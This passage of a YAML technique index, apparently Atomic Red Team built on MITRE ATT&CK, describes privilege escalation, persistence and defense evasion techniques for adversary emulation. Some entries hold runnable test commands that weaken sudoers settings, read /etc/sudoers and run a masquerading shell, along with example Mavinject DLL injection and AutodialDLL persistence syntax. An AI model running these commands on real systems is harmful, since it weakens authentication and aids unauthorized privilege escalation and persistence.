http://www.pretentiousname.com/misc/win7_uac_whitelist2.html - source_name: TechNet How UAC Works description: Lich, B. (2016, May 31). How User Account Control Works. Retrieved June 3, 2016. url: https://technet.microsoft.com/en-us/itpro/windows/keep-secure/how-user-account-control-works - source_name: SANS UAC Bypass description: Medin, T. (2013, August 8). PsExec UAC Bypass. Retrieved June 3, 2016. url: http://pen-testing.sans.org/blog/pen-testing/2013/08/08/psexec-uac-bypass - source_name: MSDN COM Elevation description: Microsoft. (n.d.). The COM Elevation Moniker. 
Retrieved July 26, 2016. url: https://msdn.microsoft.com/en-us/library/ms679687.aspx - source_name: enigma0x3 Fileless UAC Bypass description: Nelson, M. (2016, August 15). "Fileless" UAC Bypass using eventvwr.exe and Registry Hijacking. Retrieved December 27, 2016. url: https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ - source_name: enigma0x3 sdclt app paths description: Nelson, M. (2017, March 14). Bypassing UAC using App Paths. Retrieved May 25, 2017. url: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/ - source_name: enigma0x3 sdclt bypass description: Nelson, M. (2017, March 17). "Fileless" UAC Bypass Using sdclt.exe. Retrieved May 25, 2017. url: https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/ - source_name: TechNet Inside UAC description: 'Russinovich, M. (2009, July). User Account Control: Inside Windows 7 User Account Control. Retrieved July 26, 2016.' url: https://technet.microsoft.com/en-US/magazine/2009.07.uac.aspx - source_name: Fortinet Fareit description: Salvio, J., Joven, R. (2016, December 16). Malicious Macro Bypasses UAC to Elevate Privilege for Fareit Malware. Retrieved December 27, 2016. url: https://blog.fortinet.com/2016/12/16/malicious-macro-bypasses-uac-to-elevate-privilege-for-fareit-malware - source_name: Github UACMe description: UACME Project. (2016, June 16). UACMe. Retrieved July 26, 2016. url: https://github.com/hfiref0x/UACME object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:25.823Z' name: 'Abuse Elevation Control Mechanism: Bypass User Account Control' description: |- Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. 
The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works) If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box.(Citation: TechNet Inside UAC)(Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows) Many methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. 
Additional bypass methods are regularly discovered and some used in the wild, such as: * eventvwr.exe can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit) Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Stefan Kanthak - Casey Smith x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows x_mitre_version: '2.2' identifier: T1548.002 atomic_tests: [] T1548.003: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--1365fe3b-0f50-455d-b4da-266ce31c23b0 created: '2020-01-30T14:34:44.992Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1548/003 external_id: T1548.003 - source_name: sudo man page 2018 description: Todd C. Miller. (2018). Sudo Man Page. Retrieved March 19, 2018. url: https://www.sudo.ws/ - source_name: OSX.Dok Malware description: Thomas Reed. (2017, July 7). New OSX.Dok malware intercepts web traffic. Retrieved July 10, 2017. url: https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/ - source_name: cybereason osx proton description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually Does. Retrieved March 19, 2018. 
url: https://www.cybereason.com/blog/labs-proton-b-what-this-mac-malware-actually-does object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:26.105Z' name: 'Abuse Elevation Control Mechanism: Sudo and Sudo Caching' description: |- Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges. Within Linux and MacOS systems, sudo (sometimes referred to as "superuser do") allows users to perform commands from terminals with elevated privileges and to control who can perform these commands on the system. The sudo command "allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments."(Citation: sudo man page 2018) Since sudo was made for the system administrator, it has some useful configuration features such as a timestamp_timeout, which is the amount of time in minutes between instances of sudo before it will re-prompt for a password. This is because sudo has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at /var/db/sudo with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a tty_tickets variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again). The sudoers file, /etc/sudoers, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. 
This provides the principle of least privilege such that users run with their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like user1 ALL=(ALL) NOPASSWD: ALL.(Citation: OSX.Dok Malware) Elevated privileges are required to edit this file though. Adversaries can also abuse poor configurations of these mechanisms to escalate privileges without needing the user's password. For example, /var/db/sudo's timestamp can be monitored to see if it falls within the timestamp_timeout range. If it does, then malware can execute sudo commands without needing to supply the user's password. Additionally, if tty_tickets is disabled, adversaries can do this from any tty for that user. In the wild, malware has disabled tty_tickets to potentially make scripting easier by issuing echo \'Defaults !tty_tickets\' >> /etc/sudoers.(Citation: cybereason osx proton) In order for this change to be reflected, the malware also issued killall Terminal. As of macOS Sierra, the sudoers file has tty_tickets enabled by default. kill_chain_phases: - kill_chain_name: mitre-attack phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux - macOS x_mitre_version: '1.1' identifier: T1548.003 atomic_tests: - name: Sudo usage auto_generated_guid: 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e description: 'Common Sudo enumeration methods. 
' supported_platforms: - macos - linux executor: name: sh elevation_required: true command: "sudo -l \nsudo cat /etc/sudoers\nsudo vim /etc/sudoers\n" - name: Unlimited sudo cache timeout auto_generated_guid: a7b17659-dd5e-46f7-b7d1-e6792c91d0bc description: 'Sets sudo caching timestamp_timeout to a value for unlimited. This is dangerous to modify without using ''visudo'', do not do this on a production system. ' supported_platforms: - macos - linux executor: name: sh elevation_required: true command: | sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /etc/sudoers sudo visudo -c -f /etc/sudoers - name: Disable tty_tickets for sudo caching auto_generated_guid: 91a60b03-fb75-4d24-a42e-2eb8956e8de1 description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous to modify without using ''visudo'', do not do this on a production system. ' supported_platforms: - macos - linux executor: name: sh elevation_required: true command: | sudo sh -c "echo Defaults "'!'"tty_tickets >> /etc/sudoers" sudo visudo -c -f /etc/sudoers T1578: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--144e007b-e638-431d-a894-45d90c54ab90 created: '2019-08-30T18:03:05.864Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1578 external_id: T1578 - source_name: Mandiant M-Trends 2020 description: Mandiant. (2020, February). M-Trends 2020. Retrieved November 17, 2024. url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:26.284Z' name: Modify Cloud Compute Infrastructure description: |- An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. 
A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots. Permissions gained from the modification of infrastructure components may bypass restrictions that prevent access to existing infrastructure. Modifying infrastructure components may also allow an adversary to evade detection and remove evidence of their presence.(Citation: Mandiant M-Trends 2020) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: false x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - IaaS x_mitre_version: '1.2' atomic_tests: [] T1542.001: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--16ab6452-c3c1-497c-a47d-206018ca1ada created: '2019-12-19T19:43:34.507Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1542/001 external_id: T1542.001 - source_name: McAfee CHIPSEC Blog description: Beek, C., Samani, R. (2017, March 8). CHIPSEC Support Against Vault 7 Disclosure Scanning. Retrieved March 13, 2017. url: https://securingtomorrow.mcafee.com/business/chipsec-support-vault-7-disclosure-scanning/ - source_name: MITRE Copernicus description: 'Butterworth, J. (2013, July 30). Copernicus: Question Your Assumptions about BIOS Security. Retrieved December 11, 2015.' url: http://www.mitre.org/capabilities/cybersecurity/overview/cybersecurity-blog/copernicus-question-your-assumptions-about - source_name: Intel HackingTeam UEFI Rootkit description: Intel Security. (2005, July 16). HackingTeam's UEFI Rootkit Details. Retrieved November 17, 2024. 
url: https://web.archive.org/web/20170313124421/http://www.intelsecurity.com/advanced-threat-research/content/data/HT-UEFI-rootkit.html - source_name: Github CHIPSEC description: Intel. (2017, March 18). CHIPSEC Platform Security Assessment Framework. Retrieved March 20, 2017. url: https://github.com/chipsec/chipsec - source_name: About UEFI description: UEFI Forum. (n.d.). About UEFI Forum. Retrieved January 5, 2016. url: http://www.uefi.org/about - source_name: MITRE Trustworthy Firmware Measurement description: Upham, K. (2014, March). Going Deep into the BIOS with MITRE Firmware Security Research. Retrieved January 5, 2016. url: http://www.mitre.org/publications/project-stories/going-deep-into-the-bios-with-mitre-firmware-security-research - source_name: Wikipedia UEFI description: Wikipedia. (2017, July 10). Unified Extensible Firmware Interface. Retrieved July 11, 2017. url: https://en.wikipedia.org/wiki/Unified_Extensible_Firmware_Interface - source_name: Wikipedia BIOS description: Wikipedia. (n.d.). BIOS. Retrieved January 5, 2016. url: https://en.wikipedia.org/wiki/BIOS object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:26.714Z' name: 'Pre-OS Boot: System Firmware' description: |- Adversaries may modify system firmware to persist on systems. The BIOS (Basic Input/Output System) and the Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer.(Citation: Wikipedia BIOS)(Citation: Wikipedia UEFI)(Citation: About UEFI) System firmware like BIOS and (U)EFI underlie the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity. 
Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect. kill_chain_phases: - kill_chain_name: mitre-attack phase_name: persistence - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Jean-Ian Boutin, ESET - McAfee - Ryan Becwar x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows - Network Devices x_mitre_version: '1.2' identifier: T1542.001 atomic_tests: [] T1574.011: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--17cc750b-e95b-4d7d-9dde-49e0de24148c created: '2020-03-13T11:42:14.444Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1574/011 external_id: T1574.011 - source_name: Tweet Registry Perms Weakness description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved September 12, 2024." url: https://x.com/r0wdy_/status/936365549553991680 - source_name: insecure_reg_perms description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service Insecure Registry Permissions EoP. Retrieved August 25, 2021. url: https://itm4n.github.io/windows-registry-rpceptmapper-eop/ - source_name: hexacorn description: hexacorn. (2015, January 13). Beyond good ol’ Run key, Part 24. Retrieved September 25, 2025. url: https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/ - source_name: Kansa Service related collectors description: 'Hull, D.. (2014, May 3). Kansa: Service related collectors and analysis. Retrieved October 10, 2019.' 
url: https://trustedsignal.blogspot.com/2014/05/kansa-service-related-collectors-and.html - source_name: malware_hides_service description: Lawrence Abrams. (2004, September 10). How Malware hides and is installed as a Service. Retrieved August 30, 2021. url: https://www.bleepingcomputer.com/tutorials/how-malware-hides-as-a-service/ - source_name: Autoruns for Windows description: Mark Russinovich. (2019, June 28). Autoruns for Windows v13.96. Retrieved March 13, 2020. url: https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns - source_name: MDSec description: MDSec. (n.d.). Autodial(DLL)ing Your Way. Retrieved September 25, 2025. url: https://www.mdsec.co.uk/2022/10/autodialdlling-your-way/ - source_name: Registry Key Security description: Microsoft. (2018, May 31). Registry Key Security and Access Rights. Retrieved March 16, 2017. url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry-key-security-and-access-rights?redirectedfrom=MSDN - source_name: microsoft_services_registry_tree description: Microsoft. (2021, August 5). HKLM\SYSTEM\CurrentControlSet\Services Registry Tree. Retrieved August 25, 2021. url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree - source_name: gendigital description: 'Threat Research Team. (2022, March 22). Operation Dragon Castling: APT group targeting betting companies. Retrieved September 25, 2025.' url: https://www.gendigital.com/blog/insights/research/operation-dragon-castling-apt-group-targeting-betting-companies object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:27.075Z' name: 'Hijack Execution Flow: Services Registry Permissions Weakness' description: |- Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. 
Flaws in the permissions for Registry keys related to services can allow adversaries to redirect the originally specified executable to one they control, launching their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service) If the permissions for users and groups are not properly set and allow access to the Registry keys for a service, adversaries may change the service's binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, the adversary-controlled program will execute, allowing the adversary to establish persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService). Adversaries may also alter other Registry keys in the service’s Registry tree. 
For example, the FailureCommand key may be changed so that the service is executed in an elevated context anytime the service fails or is intentionally corrupted.(Citation: Kansa Service related collectors)(Citation: Tweet Registry Perms Weakness) The Performance key contains the name of a driver service's performance DLL and the names of several exported functions in the DLL.(Citation: microsoft_services_registry_tree) If the Performance key is not already present and if an adversary-controlled user has the Create Subkey permission, adversaries may create the Performance key in the service’s Registry tree to point to a malicious DLL.(Citation: insecure_reg_perms) Adversaries may also add the Parameters key, which can reference malicious driver file paths. This technique has been identified as a method of abuse by configuring DLL file paths within the Parameters key of a given service's Registry configuration. By placing and configuring the Parameters key to reference a malicious DLL, adversaries can ensure that their code is loaded persistently whenever the associated service or library is invoked. For example, the Registry path(Citation: MDSec) HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters(Citation: hexacorn)(Citation: gendigital) contains the AutodialDLL value, which specifies the DLL to be loaded for autodial functionality. An adversary could set the AutodialDLL value to point to a hijacked or malicious DLL: "AutodialDLL"="c:\temp\foo.dll" This ensures persistence, as it causes the DLL (in this case, foo.dll) to be loaded each time the Winsock 2 library is invoked. kill_chain_phases: - kill_chain_name: mitre-attack phase_name: persistence - kill_chain_name: mitre-attack phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.3.0 x_mitre_contributors: - Travis Smith, Tripwire - Matthew Demaske, Adaptforward - Joe Gumke, U.S. 
Bank x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows x_mitre_version: '1.3' identifier: T1574.011 atomic_tests: [] T1542.003: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--1b7b1806-7746-41a1-a35d-e48dae25ddba created: '2019-12-19T21:05:38.123Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1542/003 external_id: T1542.003 - source_name: Lau 2011 description: Lau, H. (2011, August 8). Are MBR Infections Back in Fashion? (Infographic). Retrieved November 13, 2014. url: http://www.symantec.com/connect/blogs/are-mbr-infections-back-fashion - source_name: Mandiant M Trends 2016 description: Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved November 17, 2024. url: https://web.archive.org/web/20211024160454/https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf - source_name: welivesecurity description: 'Martin Smolár. (2023, March 1). BlackLotus UEFI bootkit: Myth confirmed. Retrieved February 11, 2025.' url: https://www.welivesecurity.com/2023/03/01/blacklotus-uefi-bootkit-myth-confirmed/ - source_name: Microsoft Security description: 'Microsoft Incident Response. (2023, April 11). Guidance for investigating attacks using CVE-2022-21894: The BlackLotus campaign. Retrieved February 12, 2025.' url: https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:28.341Z' name: Bootkit description: |- Adversaries may use bootkits to persist on systems. 
A bootkit is a malware variant that modifies the boot sectors of a hard drive, allowing malicious code to execute before a computer's operating system has loaded. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly. In BIOS systems, a bootkit may modify the Master Boot Record (MBR) and/or Volume Boot Record (VBR).(Citation: Mandiant M Trends 2016) The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code.(Citation: Lau 2011) The MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code. In UEFI (Unified Extensible Firmware Interface) systems, a bootkit may instead create or modify files in the EFI system partition (ESP). The ESP is a partition on data storage used by devices containing UEFI that allows the system to boot the OS and other utilities used by the system. 
An adversary can use the newly created or patched files in the ESP to run malicious kernel code.(Citation: Microsoft Security)(Citation: welivesecurity) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: persistence - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux - Windows x_mitre_version: '1.2' atomic_tests: [] T1218.013: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--1bae753e-8e52-4055-a66d-2ead90303ca9 created: '2021-09-22T17:45:10.241Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1218/013 external_id: T1218.013 - source_name: ATT Lazarus TTP Evolution description: Fernando Martinez. (2021, July 6). Lazarus campaign TTPs and evolution. Retrieved September 22, 2021. url: https://cybersecurity.att.com/blogs/labs-research/lazarus-campaign-ttps-and-evolution - source_name: LOLBAS Mavinject description: LOLBAS. (n.d.). Mavinject.exe. Retrieved September 22, 2021. url: https://lolbas-project.github.io/lolbas/Binaries/Mavinject/ - source_name: Mavinject Functionality Deconstructed description: Matt Graeber. (2018, May 29). mavinject.exe Functionality Deconstructed. Retrieved September 22, 2021. url: https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e - source_name: Reaqta Mavinject description: 'Reaqta. (2017, December 16). From False Positive to True Positive: the story of Mavinject.exe, the Microsoft Injector. Retrieved September 22, 2021.' 
url: https://reaqta.com/2017/12/mavinject-microsoft-injector/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:28.606Z' name: Mavinject description: "Adversaries may abuse mavinject.exe to proxy execution of malicious code. Mavinject.exe is the Microsoft Application Virtualization Injector, a Windows utility that can inject code into external processes as part of Microsoft Application Virtualization (App-V).(Citation: LOLBAS Mavinject)\n\nAdversaries may abuse mavinject.exe to inject malicious DLLs into running processes (i.e. [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001)), allowing for arbitrary code execution (ex. C:\\Windows\\system32\\mavinject.exe PID /INJECTRUNNING PATH_DLL).(Citation: ATT Lazarus TTP Evolution)(Citation: Reaqta Mavinject) Since mavinject.exe may be digitally signed by Microsoft, proxying execution via this method may evade detection by security products because the execution is masked under a legitimate process. \n\nIn addition to [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001), Mavinject.exe can also be abused to perform import descriptor injection via its /HMODULE command-line parameter (ex. mavinject.exe PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER). 
This command would inject an import table entry consisting of the specified DLL into the module at the given base address.(Citation: Mavinject Functionality Deconstructed)" kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows x_mitre_version: '2.0' atomic_tests: [] T1036.005: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2 created: '2020-02-10T20:43:10.239Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1036/005 external_id: T1036.005 - source_name: Twitter ItsReallyNick Masquerading Update description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading. Retrieved September 12, 2024. url: https://x.com/ItsReallyNick/status/1055321652777619457 - source_name: Docker Images description: Docker. (n.d.). Docker Images. Retrieved April 6, 2021. url: https://docs.docker.com/engine/reference/commandline/images/ - source_name: Elastic Masquerade Ball description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball. Retrieved October 31, 2016.' url: https://www.elastic.co/blog/how-hunt-masquerade-ball - source_name: Aquasec Kubernetes Backdoor 2023 description: Michael Katchinskiy and Assaf Morag. (2023, April 21). First-Ever Attack Leveraging Kubernetes RBAC to Backdoor Clusters. Retrieved March 24, 2025. 
url: https://www.aquasec.com/blog/leveraging-kubernetes-rbac-to-backdoor-clusters/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:28.950Z' name: 'Masquerading: Match Legitimate Name or Location' description: "Adversaries may match or approximate the name or location of legitimate files, Registry keys, or other resources when naming/placing them. This is done for the sake of evading defenses and observation. \n\nThis may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: `svchost.exe`). Alternatively, a Windows Registry key may be given a close approximation to a key used by a legitimate program. In containerized environments, a threat actor may create a resource in a trusted namespace or one that matches the naming convention of a container pod or cluster.(Citation: Aquasec Kubernetes Backdoor 2023)" kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Yossi Weizman, Azure Defender Research Team - Vishwas Manral, McAfee x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Containers - ESXi - Linux - macOS - Windows x_mitre_version: '2.0' identifier: T1036.005 atomic_tests: - name: Execute a process from a directory masquerading as the current parent directory auto_generated_guid: 812c3ab8-94b0-4698-a9bf-9420af23ce24 description: 'Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`) ' supported_platforms: - macos - linux input_arguments: test_message: description: Test message to echo out to the screen type: string default: Hello from the Atomic Red Team test T1036.005#1 executor: name: sh elevation_required: 
false command: | mkdir $HOME/... cp $(which sh) $HOME/... $HOME/.../sh -c "echo #{test_message}" cleanup_command: | rm -f $HOME/.../sh rmdir $HOME/.../ T1600: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--1f9012ef-1e10-4e48-915e-e03563435fe8 created: '2020-10-19T18:47:08.759Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1600 external_id: T1600 - source_name: Cisco Synful Knock Evolution description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020. url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices - source_name: Cisco Blog Legacy Device Attacks description: Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020. url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954 object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:30.124Z' name: Weaken Encryption description: |- Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution) Encryption can be used to protect transmitted network traffic to maintain its confidentiality (protect against unauthorized disclosure) and integrity (protect against unauthorized changes). Encryption ciphers are used to convert a plaintext message to ciphertext and can be computationally intensive to decipher without the associated decryption key. Typically, longer keys increase the cost of cryptanalysis, or decryption without the key. Adversaries can compromise and manipulate devices that perform encryption of network traffic. 
For example, through behaviors such as [Modify System Image](https://attack.mitre.org/techniques/T1601), [Reduce Key Space](https://attack.mitre.org/techniques/T1600/001), and [Disable Crypto Hardware](https://attack.mitre.org/techniques/T1600/002), an adversary can negatively affect and/or eliminate a device’s ability to securely encrypt network traffic. This poses a greater risk of unauthorized disclosure and may help facilitate data manipulation, Credential Access, or Collection efforts. (Citation: Cisco Blog Legacy Device Attacks) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: false x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Network Devices x_mitre_version: '1.1' atomic_tests: [] T1036.008: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--208884f1-7b83-4473-ac22-4e1cf6c41471 created: '2023-03-08T22:40:06.918Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1036/008 external_id: T1036.008 - source_name: polygot_icedID description: 'Lim, M. (2022, September 27). More Than Meets the Eye: Exposing a Polyglot File That Delivers IcedID. Retrieved September 29, 2022.' url: https://unit42.paloaltonetworks.com/polyglot-file-icedid-payload object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-08T17:44:11.183Z' name: Masquerade File Type description: "Adversaries may masquerade malicious payloads as legitimate files through changes to the payload's formatting, including the file’s signature, extension, icon, and contents. Various file types have a typical standard format, including how they are encoded and organized. 
